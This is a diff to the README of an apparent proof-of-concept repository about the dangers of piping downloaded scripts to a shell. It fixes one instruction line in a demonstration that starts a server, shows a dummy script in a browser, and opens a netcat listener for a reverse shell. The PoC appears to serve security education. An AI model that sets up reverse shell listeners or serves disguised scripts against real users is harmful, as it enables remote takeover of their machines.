dim1119/piping-to-shell-PoC/README.md

 ## Demonstration
 * First of all, setup the server.
 	* `python3 server.py`
-* In a browser and access `/script.sh`.
+* Open a browser and access `/script.sh`.
 The dummy script should appear.
 	* ![Browser](./images/browser_output.png)
 * Open a new terminal and setup a listener for the reverse shell.
 	* `nc -nvlp 5555`